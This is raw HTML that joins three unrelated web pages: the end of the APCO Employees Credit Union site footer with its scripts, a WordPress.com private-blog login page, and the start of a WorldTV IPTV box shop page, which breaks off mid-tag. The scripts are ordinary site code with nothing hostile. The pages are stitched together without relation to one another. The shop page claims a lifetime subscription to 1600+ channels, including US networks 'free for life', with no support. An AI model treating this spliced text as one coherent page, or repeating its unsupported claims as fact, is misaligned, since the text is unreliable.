alt="NCUA Equal Opportunity Lender Logo"><br /> <a href="https://co-opcreditunions.org/" data-linkify="true"><img src="/wp-content/uploads/CO-OP_W.png" title="CO-OP Logo" width="60" height="50" alt="CO-OP Logo in white"></a></div> </div> </div></div><div class="four columns"><div id="nav_menu-3" class="widget_box widget_nav_menu"><h4>Accounts</h4><div class="menu-accounts-container"><ul id="menu-accounts" class="menu"><li id="menu-item-1815" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1815"><a href="https://www.apcocu.org/accounts/certificates-of-deposit/">Certificates of Deposit</a></li> <li id="menu-item-1816" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1816"><a href="https://www.apcocu.org/accounts/checking-accounts/">Checking Accounts</a></li> <li id="menu-item-1818" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1818"><a href="https://www.apcocu.org/accounts/christmas-club-accounts/">Christmas Club Accounts</a></li> <li id="menu-item-1817" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1817"><a href="https://www.apcocu.org/accounts/individual-retirement-accounts/">Individual Retirement Accounts</a></li> <li id="menu-item-1814" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1814"><a href="https://www.apcocu.org/accounts/share-accounts/">Share Accounts</a></li> </ul></div></div></div><div class="four columns"><div id="nav_menu-4" class="widget_box widget_nav_menu"><h4>Loans</h4><div class="menu-loans-container"><ul id="menu-loans" class="menu"><li id="menu-item-175712" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-175712"><a href="https://www.apcocu.org/loan-application-preview/">Auto Loans</a></li> <li id="menu-item-1823" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1823"><a href="https://apcocu.mortgagewebcenter.com">Mortgage Loans</a></li> <li id="menu-item-175711" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-175711"><a href="https://www.apcocu.org/loan-application-preview/">Personal Loans</a></li> <li id="menu-item-1822" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1822"><a href="https://www.apcocu.org/loans/visa-credit-cards/">Visa Credit Cards</a></li> <li id="menu-item-174978" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-174978"><a href="https://www.apcocu.org/calculators/">Calculators</a></li> </ul></div></div></div><div class="four columns"><div id="nav_menu-5" class="widget_box widget_nav_menu"><h4>Rates</h4><div class="menu-rates-container"><ul id="menu-rates" class="menu"><li id="menu-item-1901" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1901"><a href="https://www.apcocu.org/rates/auto-rates/">Auto Rates</a></li> <li id="menu-item-2536" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2536"><a href="https://www.apcocu.org/rates/mortgage-rates/">Mortgage Rates</a></li> <li id="menu-item-1903" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1903"><a href="https://www.apcocu.org/rates/other-rates/">Other Rates</a></li> <li id="menu-item-1902" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1902"><a href="https://www.apcocu.org/rates/personal-rates/">Personal Rates</a></li> <li id="menu-item-1900" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1900"><a href="https://www.apcocu.org/rates/savings-rates/">Savings Rates</a></li> </ul></div></div></div> </aside> <!-- FOOTER END --> </footer> </div> </div> <div class="footer_bottom_bg_fluid"> <div class="container"> <aside class="footer_bottom stocks"> <div class="sixteen columns"> </div> </aside> <aside class="footer_bottom"> <div class="sixteen columns stocks"> <span class="footer_left"> <!--BEGIN #logo --> Copyright &copy;2019 &nbsp; | &nbsp; <a href="https://www.apcocu.org"> APCO Employees Credit Union </a> &nbsp; | &nbsp; <a href="/about-us/apco-employees-credit-union-privacy-disclosure/"> Privacy Notice </a> </span> <span class="footer_right"></span> </div> </aside> </div> </div> <!--END #footer--> <div id="cmioffsitelinkifier-notification-area"> <div class="cmioffsitelinkifier-notification"> <div class="cmioffsitelinkifier-notification-text"> <p style="text-align: center;"><img class="alignnone wp-image-2366" src="https://www.apcocu.org/wp-content/uploads/apco-logo-420x150-june-2014.png" alt="apco-logo-420x150-june-2014" width="270" height="93" /></p> <p style="text-align: center;">You are leaving APCO Employees Credit Union's website, and entering an online community website. The privacy and security policies of the site you are about to enter may differ from those practiced by APCO Employees Credit Union. APCO does not represent either the third party or you if the two of you enter into a transaction.</p> </div> <div class="cmioffsitelinkifier-notification-acknowledgement"> <div id="cmioffsitelinkifier-notification-acknowledgement-area"> <input type="button" id="cmioffsitelinkifier-notification-acknowledgement" value="Proceed" /> <input type="button" id="cmioffsitelinkifier-notification-cancel" value="Cancel" /> </div> </div> </div> <div class="cmioffsitelinkifier-overlay"></div> </div> <link rel='stylesheet' id='slideshow-jquery-image-gallery-stylesheet_functional-css' href='https://www.apcocu.org/wp-content/plugins/slideshow-jquery-image-gallery/style/SlideshowPlugin/functional.css?ver=2.3.1' type='text/css' media='all' /> <link rel='stylesheet' id='slideshow-jquery-image-gallery-stylesheet_style-light-css' href='https://www.apcocu.org/wp-content/plugins/slideshow-jquery-image-gallery/css/style-light.css?ver=2.3.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery.superfish.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery.supersubs.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/custom.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery-picture-min.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery.mobilemenu.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery.sliderkit.min.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery.easing.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery.fitvids.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery.accordion.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/themes/davrack/js/jquery.uitotop.min.js'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-includes/js/comment-reply.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.apcocu.org\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var qpprFrontData = {"linkData":{"https:\/\/www.apcocu.org\/investment-services\/":[0,0,""]},"siteURL":"https:\/\/www.apcocu.org","siteURLq":"https:\/\/www.apcocu.org"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.1.8'></script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=6LeHYZQUAAAAAOj6ewUpDLmcqJitnkfXU8qt71ny&#038;ver=3.0'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var SlideshowPluginSettings_1637 = {"animation":"directFade","slideSpeed":"1","descriptionSpeed":"0.4","intervalSpeed":"10","slidesPerView":"1","maxWidth":"672","aspectRatio":"3:1","height":"323","imageBehaviour":"natural","showDescription":"false","hideDescription":"true","preserveSlideshowDimensions":"false","enableResponsiveness":"true","play":"true","loop":"true","pauseOnHover":"true","controllable":"true","hideNavigationButtons":"false","showPagination":"true","hidePagination":"true","controlPanel":"false","hideControlPanel":"true","waitUntilLoaded":"true","showLoadingIcon":"true","random":"false","avoidFilter":"true","stretchImages":"false"}; var slideshow_jquery_image_gallery_script_adminURL = "https:\/\/www.apcocu.org\/wp-admin\/"; /* ]]> */ </script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/plugins/slideshow-jquery-image-gallery/js/min/all.frontend.min.js?ver=2.3.1'></script> <script> document.addEventListener('DOMContentLoaded', function() { }); </script> <script type="text/javascript"> ( function( grecaptcha, sitekey ) { var wpcf7recaptcha = { execute: function() { grecaptcha.execute( sitekey, { action: 'homepage' } ).then( function( token ) { var forms = document.getElementsByTagName( 'form' ); for ( var i = 0; i < forms.length; i++ ) { var fields = forms[ i ].getElementsByTagName( 'input' ); for ( var j = 0; j < fields.length; j++ ) { var field = fields[ j ]; if ( 'g-recaptcha-response' === field.getAttribute( 'name' ) ) { field.setAttribute( 'value', token ); break; } } } } ); } }; grecaptcha.ready( wpcf7recaptcha.execute ); document.addEventListener( 'wpcf7submit', wpcf7recaptcha.execute, false ); } )( grecaptcha, '6LeHYZQUAAAAAOj6ewUpDLmcqJitnkfXU8qt71ny' ); </script> <script> jQuery("form").on('hover', "span.wpcf7-not-valid-tip", function() { jQuery(this).fadeOut(); }); </script> <!--END body--> </body> <!--END html--> </html>
0
<!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <!--<![endif]--> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Protected Blog &rsaquo; Log in</title> <link rel='stylesheet' id='all-css-0-1' href='https://s0.wp.com/_static/??-eJzTLy/QzcxLzilNSS3WTy4u1k9JLM7ITM7PK9bLzczTA4ro6KMrSSotKUFXkJgC5IFl0/KLcnHJ5Rga5OGSyk/PhMvZ59oampqamZqaGFhYZAEAcGc6QQ==?cssminify=yes' type='text/css' media='all' /> <link rel='stylesheet' href='https://s1.wp.com/wp-admin/css/wpcom.css?m=1529335448h&#038;version=5.2' type='text/css' /> <link rel='stylesheet' href='https://s1.wp.com/wp-admin/css/wpcom.css?m=1529335448h&#038;version=5.2' type='text/css' /> <link rel='dns-prefetch' href='//s2.wp.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJzTLy/QzcxLzilNSS3WzwKiwtLUokoopZdVrKOPT4FubmZ6UWJJql5uZh5McXJ+XklqXglIbUF+cUluanFxYnoqFtnc/KTMnFTd0uLUIqCCvBKgNWn5QHX2ubaGpqYGRiaWxsamWQA4GTsC'></script> <link rel='stylesheet' id='all-css-0-2' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/wpcom-smileys/wpcom-smileys.css,/wp-admin/css/wpcom.css?m=1529335448j&cssminify=yes' type='text/css' media='all' /> <style type="text/css"> body, form .input { font-family: "Open Sans", "Helvetica Neue", "Arial", sans; } body.login.recover-password, body.login.recover-password-success { height: auto; min-height: 100%; } #recovery { padding-bottom: 24px; } .recover-password #login_error { width: auto; } #login_error ul { list-style: square outside none; margin-left: 15px; } #login_error ol { margin-left: 25px; } .message ol { margin: 10px 0px 10px 20px; } #login_error h2, #recovery h2 { padding-bottom: 10px; } #login_error h3 { padding-bottom: 5px; } #login_error h3 { margin-top: 10px; } .recover-password #recovery h2 { margin-bottom: 5px; } .recover-password-success #recovery h2 { margin-bottom: .5em; } .recover-password #recovery p { line-height: 1.6; padding-bottom: 10px; border-top: none; } .recover-password-success #recovery p { line-height: 1.6; padding-bottom: 1em; } .recovery-stage { margin: 14px 0px 27px 0px; } .login .recovery-stage input[type="text"] { margin-bottom: 5px; } .recovery-ownership-message { background-color: #fff; -webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1); box-shadow: 0 1px 2px rgba(0,0,0,0.1); padding: 7px 15px 0 15px; margin: 1em 0; background: #ffffe0; } .recovery-error-message { display: none; background-color: #f1831e; -webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1); box-shadow: 0 1px 2px rgba(0,0,0,0.1); padding: 7px 15px 0 15px; margin: 1em 0; background: #f1831e; } .recover-password #recovery textarea { width: 100%; box-sizing: border-box; -moz-box-sizing:border-box; -webkit-box-sizing:border-box; -ms-box-sizing:border-box; } .recover-password #recovery .recovery-ownership-title { position: relative; padding-bottom: 0; } .recovery-ownership-help { float: right; font-size: 11px; margin-top: -10px; margin-bottom: 5px; } .recovery-ownership { clear: both; } .recovery-ownership-help { margin: 3px 0 0 0; } .recovery-ownership-help-text { display: none; position: absolute; top: 25px; right: 0; z-index: 100; border: 1px solid #e6db55; background-color: lightyellow; width: 250px; padding: 8px; box-shadow: 0 4px 10px -1px rgba(200, 200, 200, 0.7); } .account-recovery-link { margin-bottom: 16px; } .login #nosms { font-size: 13px; padding: 0 24px 0; margin: 16px 0 0 0; } </style> <style type="text/css"> .twostep-login-details strong { white-space: nowrap; } </style> <meta name='robots' content='noindex,follow' /> <link rel="icon" href="https://burieddeepanddark.files.wordpress.com/2018/04/cropped-venus-2.jpg?w=32" sizes="32x32" /> <link rel="icon" href="https://burieddeepanddark.files.wordpress.com/2018/04/cropped-venus-2.jpg?w=192" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://burieddeepanddark.files.wordpress.com/2018/04/cropped-venus-2.jpg?w=180" /> <meta name="msapplication-TileImage" content="https://burieddeepanddark.files.wordpress.com/2018/04/cropped-venus-2.jpg?w=270" /> </head> <body class="login login-action-login wp-core-ui locale-en private-login"> <div id="login"> <h1><a href="https://wordpress.com/" title="WordPress.com" tabindex="-1">Protected Blog</a></h1> <div class="message"><p>This site is marked private by its owner. If you would like to view it, you’ll need two things:</p><ol><li>A WordPress.com account. Don’t have an account? All you need is an email address and password — <a href='https://wordpress.com/start/account?ref=private-blog'>register here!</a></li><li>Permission from the site owner. Once you've created an account, log in and revisit this screen to request an invite.</li></ol><p>If you already have both of these, great!</p><p style="text-align: center; margin-top: 10px"><a class="button-primary" href="//wordpress.com/log-in?redirect_to=http%3A%2F%2Fburieddeepanddark.wordpress.com%2F" style="float: none;">Log in here</a></p></div> <p id="backtoblog"> <a href="https://wordpress.com/" title="Are you lost?">&larr; Back to WordPress.com</a> </p> </div> </body> </html>
0
<!doctype html> <html class="no-js" lang="en-US"> <head> <meta charset="utf-8"> <meta name = "format-detection" content="telephone = no" /> <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no"> <title>Best Smart IPTV Box Channels - WorldTV Official Website</title> <meta name="renderer" content="webkit"> <meta name="keywords" content="Tv Box, Android Tv Box, Smart Tv Box, IPTV Box, WorldTV"> <meta name="description" content="WorldTV IPTV Boxes allow you to stream your favorite movies, TV shows and live sporting events at home. WorldTV Streaming Media Player, WorldTV Best Android TV Box."> <meta name="alexaVerifyID" content="" /> <meta name="msvalidate.01" content="" /> <meta name="google-site-verification" content="7rpVdheKShTl81tDZdG9AHQanGvn9cfUmgWqFKLBAUI" /> <meta name="yandex-verification" content="" /> <meta name="p:domain_verify" content=""/> <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1"> <!-- favicon ============================================ <link rel="shortcut icon" type="image/x-icon" href="/statics/themes/base/img/favicon.png">--> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/plugins/iconfont/iconfont.css"> <!-- ulkit --> <link rel="stylesheet" type="text/css" href="https://www.worldtvmall.com/statics/plugins/uikit/css/uikit.min.css"/> <link rel="stylesheet" type="text/css" href="https://www.worldtvmall.com/statics/plugins/uikit/css/components/slideshow.min.css"/> <link rel="stylesheet" type="text/css" href="https://www.worldtvmall.com/statics/plugins/uikit/css/components/slidenav.min.css"/> <link rel="stylesheet" type="text/css" href="https://www.worldtvmall.com/statics/plugins/uikit/css/components/dotnav.min.css"/> <!-- All css files are included here. --> <link rel="stylesheet" type="text/css" href="https://www.worldtvmall.com/statics/themes/base/css/amazeui.min.css"/> <!-- Bootstrap framework main css --> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/themes/base/css/bootstrap.min.css"> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/ext/bootstrap3-dialog/css/bootstrap-dialog.css"> <!-- This core.css file contents all plugings css file. --> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/themes/base/css/core.css"> <!-- Theme shortcodes/elements style --> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/themes/base/css/shortcode/shortcodes.css"> <!-- Theme main style --> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/themes/base/css/widget.css"> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/themes/base/style.css"> <!-- Responsive css --> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/themes/base/css/responsive.css"> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/themes/base/css/animate.css"> <!-- User style --> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/themes/base/css/custom.css"> <link href="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/15/154752332016229.png" mce_href="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/15/154752332016229.png" rel="bookmark" type="image/x-icon" /> <link href="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/15/154752332016229.png" mce_href="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/15/154752332016229.png" rel="icon" type="image/x-icon" /> <link href="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/15/154752332016229.png" mce_href="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/15/154752332016229.png" rel="shortcut icon" type="image/x-icon" /> <link rel="canonical" href="https://www.worldtvmall.com//"> <!-- Modernizr JS --> <script src="https://www.worldtvmall.com/statics/themes/base/js/vendor/modernizr-2.8.3.min.js"></script> <meta property="og:title" content="Best Smart IPTV Box Channels - WorldTV Official Website"> <meta property="og:description" content="WorldTV IPTV Boxes allow you to stream your favorite movies, TV shows and live sporting events at home. WorldTV Streaming Media Player, WorldTV Best Android TV Box."> <meta property="og:url" content="https://www.worldtvmall.com/"> <meta property="og:site_name" content="Best Smart IPTV Box Channels - WorldTV Official Website"> <meta property="og:image" content=""> <meta property="twitter:card" content="summary"> <meta property="twitter:description" content="WorldTV IPTV Boxes allow you to stream your favorite movies, TV shows and live sporting events at home. WorldTV Streaming Media Player, WorldTV Best Android TV Box."> <meta property="twitter:title" content="Best Smart IPTV Box Channels - WorldTV Official Website"> <meta property="twitter:image" content=""> <link href="/statics/themes/zhuoyuechuangxin/css/index.css" rel="stylesheet"> <link href="/statics/themes/zhuoyuechuangxin/css/owl.theme.css" rel="stylesheet"> <link href="/statics/themes/zhuoyuechuangxin/css/owl.carousel.css" rel="stylesheet"> <!-- Global site tag (gtag.js) - Google Ads: 770931257 --> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-770931257"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'AW-770931257'); </script> <script> gtag('event', 'page_view', { 'send_to': 'AW-770931257', 'items': [{ 'id': 'replace with value', 'google_business_vertical': 'retail' }] }); </script> </head> <body class="home"> <!--[if lt IE 8]> <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p> <![endif]--> <!-- User style --> <!--header top start--> <div class="header"> <div class="head-top"> <div class="container"> <p class="head-text">Global free shipping!</p> <div class="head-right-box"> <div id="headerUserCenterWidget"> <a href="/login.html?return=https%3A%2F%2Fwww.worldtvmall.com%2F"> <i class="fa fa-user"></i> <span>Sign in</span> </a> </div> <div class="" id="Header_cartBox" v-cloak> <a href="/cart/detail.html" class="fa fa-shopping-cart"><b>({{count}})</b></a> <ul style="display:block"> <template v-for="item in list"> <li> <div class="cart-img"> <a v-bind:href="item.url"><img width="80" v-bind:src="item.productData.thumb" v-bind:alt="item.productData.title" /></a> </div> <div class="cart-content"> <h3><a v-bind:href="item.url" > {{item.productData.title}}</a> </h3> <span><b> <template v-for="attrItem in item.productItemData.attrData"> <template v-if="attrItem.valueList[0]">{{attrItem.valueList[0].name}}, </template> </template> </b></span> <span class="cart-price">$ {{item.productItemData.price}} <i class="fa fa-times"></i> {{item.quantity}}</span> </div> <div class="cart-del"> <i v-on:click="delete2" v-bind:data-productItemId="item.productItemData.id" class=" fa fa-times-circle"></i> </div> </li> </template> <li class="checkout m-0"><a href="javascript:;" v-on:click="checkout" >Checkout <i class="fa fa-angle-right"></i></a></li> </ul> </div> <form style="display:block" id="headerDeleteForm" role="flform" action="/cart/delete.html" beforeSubmit="headerBoxBeforeSubmit" afterSubmit="headerBoxAfterSubmit" > <input type="hidden" name="productItemId" value="" /> </form> <div class="dropdown" id="LanguageWidget"> <button type="button" class="btn dropdown-toggle" data-toggle="dropdown"> <span class="lang">English</span> <i class="fa fa-angle-down"></i> </button> <ul class="dropdown-menu"> <li> <a href="/"> <span>English</span> </a> </li> </ul> </div> <div class="dropdown" id="currencyWidget"> <button type="button" class="btn dropdown-toggle" data-toggle="dropdown"> <span class="flk-flag-icon-us"></span> <span class="txt">USD</span> <i class="fa fa-angle-down"></i> </button> <ul class="dropdown-menu"> <li> <a class="cCurrencySelectItem" href="javascript:;" data-sign="$" data-code="USD"> <span class="flk-flag-icon-us"></span> USD </a> </li> </ul> </div> <div class="search-box dropdown"> <span class="fa fa-search" data-toggle="dropdown"></span> <div class="dropdown-menu"> <div id="searchProductWidget" v-cloak> <form action="/products/index.html"> <input type="text" v-model="wd" autocomplete="off" name="wd" placeholder="Search" value="" /> <button class="button-search"></button> </form> <ul class="dropbox"> <li v-for="item in productList"> <a v-bind:href="item.url"> <div class="imgbox"><img v-bind:src="item.thumb" alt=""></div> <div class="info">{{item.title}}</div> </a> </li> </ul> </div> </div> </div> </div> </div> </div> <div class="head-nav"> <div class="scroll-box"> <div class="container"> <div class="logo"> <a href="/" title="home"><img src="/uploads/sy18127092301/2019/01/14/154744839724300.png" alt="Best Smart IPTV Box Channels - WorldTV Official Website"/></a> </div> <ul id="menuWidget"> <li> <a href="/" class="nav-d-btn" title="HOME"> HOME </a> </li> <li> <a href="/product/wtvpro-61.html" class="nav-d-btn" title="IPTV BOX"> IPTV BOX </a> </li> <li> <a href="/articles-category/channels_list-5.html" class="nav-d-btn" title="CHANNELS"> CHANNELS <i class="fa fa-angle-down"></i> </a> <ul class="nav-d-list"> <li> <a href="/p/North+America-10.html" class="nav-d-btn" title="North America"> North America </a> </li> <li> <a href="/p/South+America-11.html" class="nav-d-btn" title="South America"> South America </a> </li> <li> <a href="/p/Europe-12.html" class="nav-d-btn" title="Europe"> Europe </a> </li> <li> <a href="/p/Arabic-13.html" class="nav-d-btn" title="Arabic"> Arabic </a> </li> <li> <a href="/p/Asia+-14.html" class="nav-d-btn" title="Asia"> Asia </a> </li> </ul> </li> <li> <a href="/articles-category/FAQ-4.html" class="nav-d-btn" title="FAQ"> FAQ </a> </li> <li> <a href="javascript:;" class="nav-d-btn" title="SUPPORT"> SUPPORT <i class="fa fa-angle-down"></i> </a> <ul class="nav-d-list"> <li> <a href="/p/Shipping-%26-Payment-3.html" class="nav-d-btn" title="Shipping & Payment"> Shipping & Payment </a> </li> <li> <a href="/p/Refund-%26-Exchange-4.html" class="nav-d-btn" title="Refund & Exchange"> Refund & Exchange </a> </li> <li> <a href="/p/Warranty-5.html" class="nav-d-btn" title="Warranty"> Warranty </a> </li> <li> <a href="/p/Privacy-Policy-6.html" class="nav-d-btn" title="Privacy Policy"> Privacy Policy </a> </li> </ul> </li> <li> <a href="/p/CONTACT-2.html" class="nav-d-btn" title="CONTACT"> CONTACT </a> </li> </ul> </div> </div> </div> </div> <!--menu end--> <div class="zhuoyuechuangxin"> <div class="banner-box"> <div class="banner home uk-slidenav-position" data-uk-slideshow="{animation: 'scroll',autoplay:true}"> <ul class="uk-slideshow"> <li> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435758718.jpg" alt="Game of Thrones" /> </a> </li> <li> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435972068.jpg" alt="GIVEAWAY" /> </a> </li> <li> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155273177810153.jpg" alt="Spring Sale" /> </a> </li> <li> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435780083.jpg" alt="1600+ Live Channels" /> </a> </li> </ul> <a href="javascript:;" class="uk-slidenav uk-slidenav-contrast uk-slidenav-previous" data-uk-slideshow-item="previous"></a> <a href="javascript:;" class="uk-slidenav uk-slidenav-contrast uk-slidenav-next" data-uk-slideshow-item="next"></a> <ul class="uk-dotnav uk-dotnav-contrast uk-position-bottom uk-text-center"> <li data-uk-slideshow-item="0"> <a href="javascript:;"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435758718.jpg" alt=""> <span>Game of Thrones</span> </a> </li> <li data-uk-slideshow-item="1"> <a href="javascript:;"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435972068.jpg" alt=""> <span>GIVEAWAY</span> </a> </li> <li data-uk-slideshow-item="2"> <a href="javascript:;"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155273177810153.jpg" alt=""> <span>Spring Sale</span> </a> </li> <li data-uk-slideshow-item="3"> <a href="javascript:;"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435780083.jpg" alt=""> <span>1600+ Live Channels</span> </a> </li> </ul> </div> <div class="banner-loading"> <div class="banner-loading-box"> <div class="loading-rect1"></div> <div class="loading-rect2"></div> <div class="loading-rect3"></div> <div class="loading-rect4"></div> <div class="loading-rect5"></div> </div> </div> </div> <div class="about"> <h2>Live TV Anytime, Anywhere</h2> <div class="container"> <div class="row" style="display:flex;flex-flow:wrap;"> <div class="col-md-6"> <div class="about-box"> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435465616.jpg" alt="Global World TV Box"> </a> <div class="about-content"> <h2>Global World TV Box</h2> <p>Easy to use, Simple Set Up, Watch more 1600+ Live Channels Effortless</p> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank">Buy Now</a> </div> </div> </div> <div class="col-md-6"> <div class="about-box"> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435522084.jpg" alt=" Pay once, Receive a Life-Time Subcription"> </a> <div class="about-content"> <h2> Pay once, Receive a Life-Time Subcription</h2> <p>No Monthly/Yearly Subscription, No need extra expensive cable. Enjoy Life-time Subscription</p> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank">Check For More</a> </div> </div> </div> <div class="col-md-6"> <div class="about-box about-box-other"> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155270580435028.jpg" alt="We Offer"> </a> <div class="about-content"> <h2>We Offer</h2> <ul class="about-content-list row"> <li class="col-md-6"> <div class="list-content"> <div class="list-icon"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237067572999.png" alt="Lifetime Subscription with 1600+ live channels"/> </div> <div class="list-text"> Lifetime Subscription with 1600+ live channels </div> </div> </li> <li class="col-md-6"> <div class="list-content"> <div class="list-icon"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237067572999.png" alt="All in one GOTV App, A part of the World TV Box, lifetime use."/> </div> <div class="list-text"> All in one GOTV App, A part of the World TV Box, lifetime use. </div> </div> </li> <li class="col-md-6"> <div class="list-content"> <div class="list-icon"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237067572999.png" alt="24X7 online with professional email support"/> </div> <div class="list-text"> 24X7 online with professional email support </div> </div> </li> <li class="col-md-6"> <div class="list-content"> <div class="list-icon"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237067572999.png" alt="No buffering , No freeze."/> </div> <div class="list-text"> No buffering , No freeze. </div> </div> </li> </ul> <p>Enjoy!</p> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank">Don't Wait</a> </div> </div> </div> <div class="col-md-6"> <div class="about-box"> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/04/22/155592435537115.jpg" alt="World TV Is Great For Cord Cutting"> </a> <div class="about-content"> <h2>World TV Is Great For Cord Cutting</h2> <p>Our Cord Cutting Package includes USA Channels , Canada Channels , Sports Channels , News Channels , 18+ Channels , Brazil Channels , Arabic Channels , India Channels, so you can get local channels like NBC, CBS, FOX, ABC, The CW, and PBS in HD Free for Life!</p> <a href="https://www.worldtvmall.com/product/wtvpro-61.html" target="_blank">Buy Now</a> </div> </div> </div> </div> </div> </div> <div class="ad"> <div class="ad-head"> <div class="ad-head-category active"> <div class="img-box"> <img class="img-default" src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237151023567.png" alt="America"> <img class="img-active" src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237154835003.png" alt=""> </div> <span>America</span> </div> <div class="ad-head-category"> <div class="img-box"> <img class="img-default" src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237151023567.png" alt="Europe"> <img class="img-active" src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237154835003.png" alt=""> </div> <span>Europe</span> </div> <div class="ad-head-category"> <div class="img-box"> <img class="img-default" src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237151023567.png" alt="Middel East&Asia"> <img class="img-active" 